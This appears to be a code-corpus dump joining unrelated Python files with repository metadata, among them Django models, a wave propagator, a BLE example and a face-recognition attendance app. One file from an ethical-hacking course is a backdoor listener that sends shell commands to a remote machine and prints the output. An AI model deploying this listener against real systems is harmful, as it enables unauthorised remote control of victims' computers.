execution_log_storage): new_execution.logfile execution_log_storage.get.assert_called_once_with(new_execution.model_id) def test_create_logfile(new_execution, execution_log_storage): new_execution.new_logfile.write("1") execution_log_storage.delete.assert_called_once_with( new_execution.model_id ) execution_log_storage.new_file.assert_called_once_with( new_execution.model_id, filename="{0}.log".format(new_execution.model_id), content_type="text/plain" ) execution_log_storage.new_file().write.assert_called_once_with("1")
33.809524
77
0.719155
0
0
0
0
1,200
0.338028
0
0
932
0.262535
bebc4c58538a85c2ad00b34ebacde9538e3d0d9b
1,613
py
Python
board/models.py
Fahreeve/TaskManager
7f0a16312b43867270eaade1fe153c07abc2c10e
[ "MIT" ]
null
null
null
board/models.py
Fahreeve/TaskManager
7f0a16312b43867270eaade1fe153c07abc2c10e
[ "MIT" ]
null
null
null
board/models.py
Fahreeve/TaskManager
7f0a16312b43867270eaade1fe153c07abc2c10e
[ "MIT" ]
1
2020-09-15T09:15:13.000Z
2020-09-15T09:15:13.000Z
from django.contrib.auth.models import User from django.core.validators import MaxValueValidator, MinValueValidator from django.db import models from django.utils.translation import ugettext_lazy as _ class Task(models.Model): CLOSE = 'cl' CANCEL = 'ca' LATER = 'la' UNDEFINED = 'un' CHOICES = ( (UNDEFINED, _("Неизвестно")), (CLOSE, _("Завершить")), (CANCEL, _("Отменить")), (LATER, _("Отложить")), ) title = models.CharField(_("Заголовок"), max_length=50) description = models.TextField(_("Описание")) executor = models.ForeignKey(User, verbose_name=_("Исполнитель"), on_delete=models.CASCADE) status = models.CharField(_("Статус"), choices=CHOICES, default=UNDEFINED, max_length=2) deadline = models.DateTimeField(_("Дедлайн")) priority = models.IntegerField(_("Приоритет"), default=1, validators=[MinValueValidator(1), MaxValueValidator(3)]) changed = models.DateTimeField(_("Дата последнего изменения"), auto_now=True) created = models.DateTimeField(_("Дата создания"), auto_now_add=True) @property def text_status(self): choices = dict(self.CHOICES) return choices[self.status] @property def text_deadline(self): return self.deadline.strftime("%d.%m.%Y %H:%M") class Comment(models.Model): task = models.ForeignKey(Task, related_name="comments", on_delete=models.CASCADE) creator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True) text = models.TextField(_('Комментарий')) created = models.DateTimeField(_("Дата создания"), auto_now_add=True)
37.511628
118
0.695598
1,549
0.882118
0
0
203
0.115604
0
0
360
0.205011
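A usage sketch for the Task and Comment models in board/models.py above, assuming a configured Django project with the board app migrated; the user, titles and dates are hypothetical.

from datetime import timedelta

from django.contrib.auth.models import User
from django.utils import timezone

from board.models import Task, Comment

executor = User.objects.create_user(username="alice")
task = Task.objects.create(
    title="Prepare release notes",
    description="Summarise the changes shipped this sprint.",
    executor=executor,
    deadline=timezone.now() + timedelta(days=3),
    priority=2,
)
Comment.objects.create(task=task, creator=executor, text="Started drafting.")

print(task.text_status)    # human-readable label for the default UNDEFINED status
print(task.text_deadline)  # deadline formatted as "dd.mm.YYYY HH:MM"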
bebe436d87bb3f3a76cbb71e91dc6e70bb5b2e46
475
py
Python
test/test_hex_line.py
bicobus/Hexy
e75d58e66546c278fb648af85e3f9dae53127826
[ "MIT" ]
72
2017-08-30T03:02:51.000Z
2022-03-11T23:15:15.000Z
test/test_hex_line.py
bicobus/Hexy
e75d58e66546c278fb648af85e3f9dae53127826
[ "MIT" ]
10
2019-03-14T08:04:33.000Z
2021-08-10T09:36:45.000Z
test/test_hex_line.py
bicobus/Hexy
e75d58e66546c278fb648af85e3f9dae53127826
[ "MIT" ]
15
2017-11-08T05:37:06.000Z
2021-08-05T19:16:48.000Z
import numpy as np
import hexy as hx


def test_get_hex_line():
    expected = [
        [-3, 3, 0],
        [-2, 2, 0],
        [-1, 2, -1],
        [0, 2, -2],
        [1, 1, -2],
    ]
    start = np.array([-3, 3, 0])
    end = np.array([1, 1, -2])
    print(hx.get_hex_line(start, end))
    print(expected)
    assert np.array_equal(hx.get_hex_line(start, end), expected)


if __name__ == "__main__":
    test_get_hex_line()
21.590909
38
0.471579
0
0
0
0
0
0
0
0
10
0.021053
bebe5670df71295bc98ec96c4bde4a3c31d4fb66
6,747
py
Python
wofry/propagator/propagators2D/integral.py
PaNOSC-ViNYL/wofry
779b5a738ee7738e959a58aafe01e7e49b03894a
[ "MIT" ]
null
null
null
wofry/propagator/propagators2D/integral.py
PaNOSC-ViNYL/wofry
779b5a738ee7738e959a58aafe01e7e49b03894a
[ "MIT" ]
1
2021-02-16T12:12:10.000Z
2021-02-16T12:12:10.000Z
wofryimpl/propagator/propagators2D/integral.py
oasys-kit/wofryimpl
f300b714b038110987783c40d2c3af8dca7e54eb
[ "MIT" ]
null
null
null
# propagate_2D_integral: Simplification of the Kirchhoff-Fresnel integral. TODO: Very slow and give some problems import numpy from wofry.propagator.wavefront2D.generic_wavefront import GenericWavefront2D from wofry.propagator.propagator import Propagator2D # TODO: check resulting amplitude normalization (fft and srw likely agree, convolution gives too high amplitudes, so needs normalization) class Integral2D(Propagator2D): HANDLER_NAME = "INTEGRAL_2D" def get_handler_name(self): return self.HANDLER_NAME def do_specific_progation_after(self, wavefront, propagation_distance, parameters, element_index=None): return self.do_specific_progation(wavefront, propagation_distance, parameters, element_index=element_index) def do_specific_progation_before(self, wavefront, propagation_distance, parameters, element_index=None): return self.do_specific_progation( wavefront, propagation_distance, parameters, element_index=element_index) """ 2D Fresnel-Kirchhoff propagator via simplified integral NOTE: this propagator is experimental and much less performant than the ones using Fourier Optics Therefore, it is not recommended to use. :param wavefront: :param propagation_distance: propagation distance :param shuffle_interval: it is known that this method replicates the central diffraction spot The distace of the replica is proportional to 1/pixelsize To avoid that, it is possible to change a bit (randomly) the coordinates of the wavefront. shuffle_interval controls this shift: 0=No shift. A typical value can be 1e5. The result shows a diffraction pattern without replica but with much noise. :param calculate_grid_only: if set, it calculates only the horizontal and vertical profiles, but returns the full image with the other pixels to zero. This is useful when calculating large arrays, so it is set as the default. 
:return: a new 2D wavefront object with propagated wavefront """ def do_specific_progation(self, wavefront, propagation_distance, parameters, element_index=None): shuffle_interval = self.get_additional_parameter("shuffle_interval",False,parameters,element_index=element_index) calculate_grid_only = self.get_additional_parameter("calculate_grid_only",True,parameters,element_index=element_index) return self.propagate_wavefront(wavefront,propagation_distance,shuffle_interval=shuffle_interval, calculate_grid_only=calculate_grid_only) @classmethod def propagate_wavefront(cls,wavefront,propagation_distance,shuffle_interval=False,calculate_grid_only=True): # # Fresnel-Kirchhoff integral (neglecting inclination factor) # if not calculate_grid_only: # # calculation over the whole detector area # p_x = wavefront.get_coordinate_x() p_y = wavefront.get_coordinate_y() wavelength = wavefront.get_wavelength() amplitude = wavefront.get_complex_amplitude() det_x = p_x.copy() det_y = p_y.copy() p_X = wavefront.get_mesh_x() p_Y = wavefront.get_mesh_y() det_X = p_X det_Y = p_Y amplitude_propagated = numpy.zeros_like(amplitude,dtype='complex') wavenumber = 2 * numpy.pi / wavelength for i in range(det_x.size): for j in range(det_y.size): if not shuffle_interval: rd_x = 0.0 rd_y = 0.0 else: rd_x = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval rd_y = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval r = numpy.sqrt( numpy.power(p_X + rd_x - det_X[i,j],2) + numpy.power(p_Y + rd_y - det_Y[i,j],2) + numpy.power(propagation_distance,2) ) amplitude_propagated[i,j] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum() output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(det_x,det_y,amplitude_propagated) else: x = wavefront.get_coordinate_x() y = wavefront.get_coordinate_y() X = wavefront.get_mesh_x() Y = wavefront.get_mesh_y() wavenumber = 2 * numpy.pi / wavefront.get_wavelength() amplitude = wavefront.get_complex_amplitude() used_indices = wavefront.get_mask_grid(width_in_pixels=(1,1),number_of_lines=(1,1)) indices_x = wavefront.get_mesh_indices_x() indices_y = wavefront.get_mesh_indices_y() indices_x_flatten = indices_x[numpy.where(used_indices == 1)].flatten() indices_y_flatten = indices_y[numpy.where(used_indices == 1)].flatten() X_flatten = X[numpy.where(used_indices == 1)].flatten() Y_flatten = Y[numpy.where(used_indices == 1)].flatten() complex_amplitude_propagated = amplitude*0 print("propagate_2D_integral: Calculating %d points from a total of %d x %d = %d"%( X_flatten.size,amplitude.shape[0],amplitude.shape[1],amplitude.shape[0]*amplitude.shape[1])) for i in range(X_flatten.size): r = numpy.sqrt( numpy.power(wavefront.get_mesh_x() - X_flatten[i],2) + numpy.power(wavefront.get_mesh_y() - Y_flatten[i],2) + numpy.power(propagation_distance,2) ) complex_amplitude_propagated[int(indices_x_flatten[i]),int(indices_y_flatten[i])] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum() output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(x_array=x, y_array=y, z_array=complex_amplitude_propagated, wavelength=wavefront.get_wavelength()) # added [email protected] 2018-03-23 to conserve energy - TODO: review method! output_wavefront.rescale_amplitude( numpy.sqrt(wavefront.get_intensity().sum() / output_wavefront.get_intensity().sum())) return output_wavefront
49.977778
156
0.621165
6,344
0.94027
0
0
4,017
0.595376
0
0
1,765
0.261598
bebf0f2b55c9070eb2aa8dd30568a2e408a3e498
842
py
Python
Problems/Study Plans/Dynamic Programming/Dynamic Programming I/07_delete_and_earn.py
andor2718/LeetCode
59874f49085818e6da751f1cc26867b31079d35d
[ "BSD-3-Clause" ]
1
2022-01-17T19:51:15.000Z
2022-01-17T19:51:15.000Z
Problems/Study Plans/Dynamic Programming/Dynamic Programming I/07_delete_and_earn.py
andor2718/LeetCode
59874f49085818e6da751f1cc26867b31079d35d
[ "BSD-3-Clause" ]
null
null
null
Problems/Study Plans/Dynamic Programming/Dynamic Programming I/07_delete_and_earn.py
andor2718/LeetCode
59874f49085818e6da751f1cc26867b31079d35d
[ "BSD-3-Clause" ]
null
null
null
# https://leetcode.com/problems/delete-and-earn/ class Solution: def deleteAndEarn(self, nums: list[int]) -> int: num_profits = dict() for num in nums: num_profits[num] = num_profits.get(num, 0) + num sorted_nums = sorted(num_profits.keys()) second_last_profit = 0 last_profit = num_profits[sorted_nums[0]] for idx in range(1, len(sorted_nums)): profit_with_curr_num = num_profits[sorted_nums[idx]] if sorted_nums[idx - 1] == sorted_nums[idx] - 1: curr_profit = max(last_profit, second_last_profit + profit_with_curr_num) else: curr_profit = last_profit + profit_with_curr_num second_last_profit, last_profit = last_profit, curr_profit return last_profit
42.1
76
0.609264
791
0.93943
0
0
0
0
0
0
48
0.057007
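With the Solution class from the delete-and-earn file above in scope, the two LeetCode examples make a quick sanity check: [3, 4, 2] yields 6 (earn 4, which deletes 3, then earn 2) and [2, 2, 3, 3, 3, 4] yields 9 (earn all three 3s, which deletes the 2s and the 4).

# Sanity check using the LeetCode examples (Solution as defined above).
solver = Solution()
print(solver.deleteAndEarn([3, 4, 2]))           # 6
print(solver.deleteAndEarn([2, 2, 3, 3, 3, 4]))  # 9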
bebf8ceeebe9e29c2c913232279dc6462e901f90
334
py
Python
Desafio051.py
GabrielSanchesRosa/Python
3a129e27e076b2a91af03d68ede50b9c45c50217
[ "MIT" ]
null
null
null
Desafio051.py
GabrielSanchesRosa/Python
3a129e27e076b2a91af03d68ede50b9c45c50217
[ "MIT" ]
null
null
null
Desafio051.py
GabrielSanchesRosa/Python
3a129e27e076b2a91af03d68ede50b9c45c50217
[ "MIT" ]
null
null
null
# Write a program that reads the first term and the common difference of an arithmetic progression (AP). At the end, show the first 10 terms of that progression.
primeiro = int(input("Primeiro Termo: "))
razao = int(input("Razão: "))
decimo = primeiro + (10 - 1) * razao
for c in range(primeiro, decimo + razao, razao):
    print(f"{c}", end=" -> ")
print("Acabou")
33.4
129
0.679641
0
0
0
0
0
0
0
0
179
0.531157
bebfe36afc8a169020e2b3f2d6602873133b4e74
884
py
Python
tiddlyweb/filters/limit.py
tiddlyweb/tiddlyweb
376bcad280e24d2de4d74883dc4d8369abcb2c28
[ "BSD-3-Clause" ]
57
2015-02-01T21:03:34.000Z
2021-12-25T12:02:31.000Z
tiddlyweb/filters/limit.py
tiddlyweb/tiddlyweb
376bcad280e24d2de4d74883dc4d8369abcb2c28
[ "BSD-3-Clause" ]
6
2016-02-05T11:43:32.000Z
2019-09-05T13:38:49.000Z
tiddlyweb/filters/limit.py
tiddlyweb/tiddlyweb
376bcad280e24d2de4d74883dc4d8369abcb2c28
[ "BSD-3-Clause" ]
17
2015-05-12T08:53:23.000Z
2021-12-21T15:56:30.000Z
""" A :py:mod:`filter <tiddlyweb.filters>` type to limit a group of entities using a syntax similar to SQL Limit:: limit=<index>,<count> limit=<count> """ import itertools def limit_parse(count='0'): """ Parse the argument of a ``limit`` :py:mod:`filter <tiddlyweb.filters>` for a count and index argument, return a function which does the limiting. Exceptions while parsing are passed up the stack. """ index = '0' if ',' in count: index, count = count.split(',', 1) index = int(index) count = int(count) def limiter(entities, indexable=False, environ=None): return limit(entities, index=index, count=count) return limiter def limit(entities, count=0, index=0): """ Make a slice of a list of entities based on a count and index. """ return itertools.islice(entities, index, index + count)
23.891892
78
0.64819
0
0
0
0
0
0
0
0
473
0.535068
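The limit filter above mirrors SQL's LIMIT: "index,count" skips index items and yields the next count. A small sketch of the parsed limiter in use, with plain ranges standing in for TiddlyWeb entities:

from tiddlyweb.filters.limit import limit_parse

limiter = limit_parse('2,3')             # skip 2, take 3 -> islice(entities, 2, 5)
print(list(limiter(range(10))))          # [2, 3, 4]

first_two = limit_parse('2')             # count only; index defaults to 0
print(list(first_two(range(10))))        # [0, 1]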
bec160209ec5f54fda5f5e3628b149076a57302b
7,019
py
Python
pytorch_keras_converter/API.py
sonibla/pytorch_keras_converter
21925b67b6eb3cbbfa8eb6d33f682d57dafd357d
[ "MIT" ]
17
2019-10-01T14:14:18.000Z
2021-04-25T13:32:24.000Z
pytorch_keras_converter/API.py
sonibla/pytorch_keras_converter
21925b67b6eb3cbbfa8eb6d33f682d57dafd357d
[ "MIT" ]
null
null
null
pytorch_keras_converter/API.py
sonibla/pytorch_keras_converter
21925b67b6eb3cbbfa8eb6d33f682d57dafd357d
[ "MIT" ]
2
2019-10-01T14:02:43.000Z
2019-10-01T14:14:19.000Z
""" Simple API to convert models between PyTorch and Keras (Conversions from Keras to PyTorch aren't implemented) """ from . import utility from . import tests from . import io_utils as utils import tensorflow def convert(model, input_shape, weights=True, quiet=True, ignore_tests=False, input_range=None, save=None, filename=None, directory=None): """ Conversion between PyTorch and Keras (Conversions from Keras to PyTorch aren't implemented) Arguments: -model: A Keras or PyTorch model or layer to convert -input_shape: Input shape (list, tuple or int), without batchsize. -weights (bool): Also convert weights. If set to false, only convert model architecture -quiet (bool): If a progress bar and some messages should appear -ignore_tests (bool): If tests should be ignored. If set to True, converted model will still be tested by security. If models are not identical, it will only print a warning. If set to False, and models are not identical, RuntimeWarning will be raised If weights is False, tests are automatically ignored -input_range: Optionnal. A list of 2 elements containing max and min values to give as input to the model when performing the tests. If None, models will be tested on samples from the "standard normal" distribution. -save: If model should be exported to a hdf5 file. -filename: Filename to give to model's hdf5 file. If filename is not None and save is not False, then save will automatically be set to True -directory: Where to save model's hdf5 file. If directory is not None and save is not False, then save will automatically be set to True Raises: -RuntimeWarning: If converted and original model aren't identical, and ignore_tests is False Returns: If model has been exported to a file, it will return the name of the file Else, it returns the converted model """ if (filename is not None or directory is not None) and save is None: save = True if save is None: save = False if weights == False: ignore_tests = True if not quiet: print('\nConversion...') # Converting: newModel = utility.convert(model=utility.LayerRepresentation(model), input_size=input_shape, weights=weights, quiet=quiet) # Actually, newModel is a LayerRepresentation object # Equivalents: torchModel = newModel.equivalent['torch'] kerasModel = newModel.equivalent['keras'] if not quiet: print('Automatically testing converted model reliability...\n') # Checking converted model reliability tested = False try: meanSquaredError = tests.comparison(model1=torchModel, model2=kerasModel, input_shape=input_shape, input_range=input_range, quiet=quiet) tested = True except tensorflow.errors.InvalidArgumentError: print("Warning: tests unavailable!") if tested and meanSquaredError > 0.0001: if ignore_tests: print("Warning: converted and original models aren't identical !\ (mean squared error: {})".format(meanSquaredError)) else: raise RuntimeWarning("Original and converted model do not match !\ \nOn random input data, outputs showed a mean squared error of {} (if should \ be below 1e-10)".format(meanSquaredError)) elif not quiet and tested: print('\n Original and converted models match !\nMean squared err\ or : {}'.format(meanSquaredError)) if save: if not quiet: print('Saving model...') defaultName = 'conversion_{}'.format(newModel.name) if filename is None: filename = defaultName # Formatting filename so that we don't overwrite any existing file file = utils.formatFilename(filename, directory) # Freezing Keras model (trainable = False everywhere) utils.freeze(kerasModel) # Save the entire model kerasModel.save(file + '.h5') if 
not quiet: print('Done !') return file + '.h5' if not quiet: print('Done !') return kerasModel def convert_and_save(model, input_shape, weights=True, quiet=True, ignore_tests=False, input_range=None, filename=None, directory=None): """ Conversion between PyTorch and Keras, and automatic save (Conversions from Keras to PyTorch aren't implemented) Arguments: -model: A Keras or PyTorch model or layer to convert -input_shape: Input shape (list, tuple or int), without batchsize. -weights (bool): Also convert weights. If set to false, only convert model architecture -quiet (bool): If a progress bar and some messages should appear -ignore_tests (bool): If tests should be ignored. If set to True, converted model will still be tested by security. If models are not identical, it will only print a warning. If set to False, and models are not identical, RuntimeWarning will be raised If weights is False, tests are automatically ignored -input_range: Optionnal. A list of 2 elements containing max and min values to give as input to the model when performing the tests. If None, models will be tested on samples from the "standard normal" distribution. -filename: Filename to give to model's hdf5 file. If filename is not None and save is not False, then save will automatically be set to True -directory: Where to save model's hdf5 file. If directory is not None and save is not False, then save will automatically be set to True Returns: Name of created hdf5 file """ return convert(model=model, input_shape=input_shape, weights=weights, quiet=quiet, ignore_tests=ignore_tests, input_range=input_range, save=True, filename=filename, directory=directory)
33.42381
78
0.581992
0
0
0
0
0
0
0
0
4,288
0.610913
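A conversion sketch for the API module above. The package import path follows the repository layout, and torchvision's resnet18 is used purely as a stand-in model; none of these names come from the record itself.

import torchvision

from pytorch_keras_converter import API

torch_model = torchvision.models.resnet18(pretrained=True)  # any PyTorch module works

# input_shape excludes the batch dimension, as the docstring above specifies.
keras_model = API.convert(torch_model,
                          input_shape=(3, 224, 224),
                          weights=True,
                          quiet=False)

# Or convert and write the frozen .h5 file in one step:
h5_path = API.convert_and_save(torch_model,
                               input_shape=(3, 224, 224),
                               filename='resnet18_converted')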
bec1a22fa74c5c4f594a0551d336d70522ed93f7
1,734
py
Python
examples/enable_notifications.py
kjwill/bleak
7e0fdae6c0f6a78713e5984c2840666e0c38c3f3
[ "MIT" ]
null
null
null
examples/enable_notifications.py
kjwill/bleak
7e0fdae6c0f6a78713e5984c2840666e0c38c3f3
[ "MIT" ]
null
null
null
examples/enable_notifications.py
kjwill/bleak
7e0fdae6c0f6a78713e5984c2840666e0c38c3f3
[ "MIT" ]
1
2021-09-15T18:53:58.000Z
2021-09-15T18:53:58.000Z
# -*- coding: utf-8 -*- """ Notifications ------------- Example showing how to add notifications to a characteristic and handle the responses. Updated on 2019-07-03 by hbldh <[email protected]> """ import sys import logging import asyncio import platform from bleak import BleakClient from bleak import _logger as logger CHARACTERISTIC_UUID = "f000aa65-0451-4000-b000-000000000000" # <--- Change to the characteristic you want to enable notifications from. ADDRESS = ( "24:71:89:cc:09:05" # <--- Change to your device's address here if you are using Windows or Linux if platform.system() != "Darwin" else "B9EA5233-37EF-4DD6-87A8-2A875E821C46" # <--- Change to your device's address here if you are using macOS ) if len(sys.argv) == 3: ADDRESS = sys.argv[1] CHARACTERISTIC_UUID = sys.argv[2] def notification_handler(sender, data): """Simple notification handler which prints the data received.""" print("{0}: {1}".format(sender, data)) async def run(address, debug=False): if debug: import sys l = logging.getLogger("asyncio") l.setLevel(logging.DEBUG) h = logging.StreamHandler(sys.stdout) h.setLevel(logging.DEBUG) l.addHandler(h) logger.addHandler(h) async with BleakClient(address) as client: logger.info(f"Connected: {client.is_connected}") await client.start_notify(CHARACTERISTIC_UUID, notification_handler) await asyncio.sleep(5.0) await client.stop_notify(CHARACTERISTIC_UUID) if __name__ == "__main__": import os os.environ["PYTHONASYNCIODEBUG"] = str(1) loop = asyncio.get_event_loop() # loop.set_debug(True) loop.run_until_complete(run(ADDRESS, True))
27.52381
136
0.689158
0
0
0
0
0
0
548
0.316032
695
0.400807
bec22a0f8cc88b9839de8e482052c5fe36989f8a
163
py
Python
pyrules/storages/base.py
miraculixx/pyrules
b10d1d5e74052fa1db93cc9b459ac9057a9eb502
[ "MIT" ]
17
2015-07-20T03:11:04.000Z
2021-05-02T03:34:05.000Z
pyrules/storages/base.py
miraculixx/pyrules
b10d1d5e74052fa1db93cc9b459ac9057a9eb502
[ "MIT" ]
20
2015-04-10T10:11:44.000Z
2020-09-10T03:51:47.000Z
pyrules/storages/base.py
miraculixx/pyrules
b10d1d5e74052fa1db93cc9b459ac9057a9eb502
[ "MIT" ]
8
2017-04-03T10:46:16.000Z
2021-11-20T05:46:02.000Z
class BaseStorage(object): def get_rule(self, name): raise NotImplementedError() def get_ruleset(self, name): raise NotImplementedError()
23.285714
35
0.680982
162
0.993865
0
0
0
0
0
0
0
0
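BaseStorage above only defines the interface; a concrete backend fills in the two lookups. A purely illustrative in-memory implementation:

from pyrules.storages.base import BaseStorage


class DictStorage(BaseStorage):
    """Illustrative in-memory backend keyed by rule / ruleset name."""

    def __init__(self, rules=None, rulesets=None):
        self._rules = rules or {}
        self._rulesets = rulesets or {}

    def get_rule(self, name):
        return self._rules[name]

    def get_ruleset(self, name):
        return self._rulesets[name]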
bec28b12230a8be61261eca269a7854ba31ae9da
820
py
Python
src/15 listener_and_backdoor/listener_2.py
raminjafary/ethical-hacking
e76f74f4f23e1d8cb7f433d19871dcf966507dfc
[ "MIT" ]
null
null
null
src/15 listener_and_backdoor/listener_2.py
raminjafary/ethical-hacking
e76f74f4f23e1d8cb7f433d19871dcf966507dfc
[ "MIT" ]
null
null
null
src/15 listener_and_backdoor/listener_2.py
raminjafary/ethical-hacking
e76f74f4f23e1d8cb7f433d19871dcf966507dfc
[ "MIT" ]
null
null
null
#!/usr/bin/python
import socket


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # option to reuse the socket address
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)  # backlog of 0 is enough for a single incoming connection
        print "[+] Waiting for Incoming Connection"
        self.connection, address = listener.accept()
        print "[+] Got a Connection from " + str(address)

    def execute_remotely(self, command):
        self.connection.send(command)
        return self.connection.recv(1024)

    def run(self):
        while True:
            command = raw_input(">> ")
            result = self.execute_remotely(command)
            print result


my_listener = Listener("localhost", 1234)
my_listener.run()
25.625
70
0.734146
725
0.884146
0
0
0
0
0
0
225
0.27439
bec37dd307106b82f4f0bcaf14227eb2f2a4ba93
1,974
py
Python
dialogflow/history2xls.py
ray-hrst/temi-tools
8efb1e1af93a41bd98fe0ee8c1fd6fb44e788341
[ "MIT" ]
1
2020-06-04T19:30:57.000Z
2020-06-04T19:30:57.000Z
dialogflow/history2xls.py
ray-hrst/temi-tools
8efb1e1af93a41bd98fe0ee8c1fd6fb44e788341
[ "MIT" ]
1
2020-01-14T04:16:12.000Z
2020-01-14T04:16:12.000Z
dialogflow/history2xls.py
ray-hrst/temi-tools
8efb1e1af93a41bd98fe0ee8c1fd6fb44e788341
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Convert Dialogflow history to spreadsheet User must manually copy the history from the browser and save this in a text file. This reads the textfile, parses the data, and saves it to a spreadsheet. Example training sample: USER サワディカ Nov 4, 11:19 PM AGENT No matched intent Nov 4, 11:19 PM more_vert """ import argparse import os from simple_report import SimpleReport # constants FIELDS = ["Date", "User", "Agent"] if __name__ == "__main__": # collect arguments PARSER = argparse.ArgumentParser( description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter ) PARSER.add_argument("filename", help="History text file") ARGS = PARSER.parse_args() # generate report filename, file_extension = os.path.splitext(ARGS.filename) REPORT = SimpleReport(filename, FIELDS) # step each line of history text file with open(ARGS.filename, 'r') as fp: num_lines = sum(1 for line in open(ARGS.filename)) rows = int(num_lines / 7) print("Reading {} lines of text.".format(num_lines)) print("Writing {} rows.".format(rows)) for row in range(1, rows): user_utterance = fp.readline().strip() # USER UTTERANCE date = fp.readline().strip() # DATE agent_intent = fp.readline().strip() # AGENT INTENT date = fp.readline().strip() # DATE _ = fp.readline().strip() # 'more_vert' utterance = user_utterance.split("USER", 1)[1] intent = agent_intent.split("AGENT", 1)[1] if not intent: intent = "Intent found" print("[{}] {} {} {}".format(row, date, utterance, intent)) # add row to report REPORT.add("Date", row, date, date) REPORT.add("User", row, utterance) REPORT.add("Agent", row, intent) REPORT.close()
27.802817
82
0.609422
0
0
0
0
0
0
0
0
693
0.349294
bec393e2a78f7bd8032716c650f164a7178aab68
25,176
py
Python
recognition/views.py
usathe71-u/Attendance-System-Face-Recognition
c73f660a6089e8ca9dd5c473efcf2bc78f13a207
[ "Apache-2.0" ]
3
2021-05-31T21:11:38.000Z
2021-07-22T18:29:47.000Z
recognition/views.py
usathe71-u/Attendance-System-Face-Recognition
c73f660a6089e8ca9dd5c473efcf2bc78f13a207
[ "Apache-2.0" ]
null
null
null
recognition/views.py
usathe71-u/Attendance-System-Face-Recognition
c73f660a6089e8ca9dd5c473efcf2bc78f13a207
[ "Apache-2.0" ]
null
null
null
from django.shortcuts import render,redirect from .forms import usernameForm,DateForm,UsernameAndDateForm, DateForm_2 from django.contrib import messages from django.contrib.auth.models import User import cv2 import dlib import imutils from imutils import face_utils from imutils.video import VideoStream from imutils.face_utils import rect_to_bb from imutils.face_utils import FaceAligner import time from attendance_system_facial_recognition.settings import BASE_DIR import os import face_recognition from face_recognition.face_recognition_cli import image_files_in_folder import pickle from sklearn.preprocessing import LabelEncoder from sklearn.neighbors import KNeighborsClassifier from sklearn.svm import SVC import numpy as np from django.contrib.auth.decorators import login_required import matplotlib as mpl import matplotlib.pyplot as plt from sklearn.manifold import TSNE import datetime from django_pandas.io import read_frame from users.models import Present, Time import seaborn as sns import pandas as pd from django.db.models import Count #import mpld3 import matplotlib.pyplot as plt from pandas.plotting import register_matplotlib_converters from matplotlib import rcParams import math mpl.use('Agg') #utility functions: def username_present(username): if User.objects.filter(username=username).exists(): return True return False def create_dataset(username): id = username if(os.path.exists('face_recognition_data/training_dataset/{}/'.format(id))==False): os.makedirs('face_recognition_data/training_dataset/{}/'.format(id)) directory='face_recognition_data/training_dataset/{}/'.format(id) # Detect face #Loading the HOG face detector and the shape predictpr for allignment print("[INFO] Loading the facial detector") detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER fa = FaceAligner(predictor , desiredFaceWidth = 96) #capture images from the webcam and process and detect the face # Initialize the video stream print("[INFO] Initializing Video stream") vs = VideoStream(src=0).start() #time.sleep(2.0) ####CHECK###### # Our identifier # We will put the id here and we will store the id with a face, so that later we can identify whose face it is # Our dataset naming counter sampleNum = 0 # Capturing the faces one by one and detect the faces and showing it on the window while(True): # Capturing the image #vs.read each frame frame = vs.read() #Resize each image frame = imutils.resize(frame ,width = 800) #the returned img is a colored image but for the classifier to work we need a greyscale image #to convert gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) #To store the faces #This will detect all the images in the current frame, and it will return the coordinates of the faces #Takes in image and some other parameter for accurate result faces = detector(gray_frame,0) #In above 'faces' variable there can be multiple faces so we have to get each and every face and draw a rectangle around it. 
for face in faces: print("inside for loop") (x,y,w,h) = face_utils.rect_to_bb(face) face_aligned = fa.align(frame,gray_frame,face) # Whenever the program captures the face, we will write that is a folder # Before capturing the face, we need to tell the script whose face it is # For that we will need an identifier, here we call it id # So now we captured a face, we need to write it in a file sampleNum = sampleNum+1 # Saving the image dataset, but only the face part, cropping the rest if face is None: print("face is none") continue cv2.imwrite(directory+'/'+str(sampleNum)+'.jpg' , face_aligned) face_aligned = imutils.resize(face_aligned ,width = 400) #cv2.imshow("Image Captured",face_aligned) # @params the initial point of the rectangle will be x,y and # @params end point will be x+width and y+height # @params along with color of the rectangle # @params thickness of the rectangle cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1) # Before continuing to the next loop, I want to give it a little pause # waitKey of 100 millisecond cv2.waitKey(50) #Showing the image in another window #Creates a window with window name "Face" and with the image img cv2.imshow("Add Images",frame) #Before closing it we need to give a wait command, otherwise the open cv wont work # @params with the millisecond of delay 1 cv2.waitKey(1) #To get out of the loop if(sampleNum>300): break #Stoping the videostream vs.stop() # destroying all the windows cv2.destroyAllWindows() def predict(face_aligned,svc,threshold=0.7): face_encodings=np.zeros((1,128)) try: x_face_locations=face_recognition.face_locations(face_aligned) faces_encodings=face_recognition.face_encodings(face_aligned,known_face_locations=x_face_locations) if(len(faces_encodings)==0): return ([-1],[0]) except: return ([-1],[0]) prob=svc.predict_proba(faces_encodings) result=np.where(prob[0]==np.amax(prob[0])) if(prob[0][result[0]]<=threshold): return ([-1],prob[0][result[0]]) return (result[0],prob[0][result[0]]) def vizualize_Data(embedded, targets,): X_embedded = TSNE(n_components=2).fit_transform(embedded) for i, t in enumerate(set(targets)): idx = targets == t plt.scatter(X_embedded[idx, 0], X_embedded[idx, 1], label=t) plt.legend(bbox_to_anchor=(1, 1)); rcParams.update({'figure.autolayout': True}) plt.tight_layout() plt.savefig('./recognition/static/recognition/img/training_visualisation.png') plt.close() def update_attendance_in_db_in(present): today=datetime.date.today() time=datetime.datetime.now() for person in present: user=User.objects.get(username=person) try: qs=Present.objects.get(user=user,date=today) except : qs= None if qs is None: if present[person]==True: a=Present(user=user,date=today,present=True) a.save() else: a=Present(user=user,date=today,present=False) a.save() else: if present[person]==True: qs.present=True 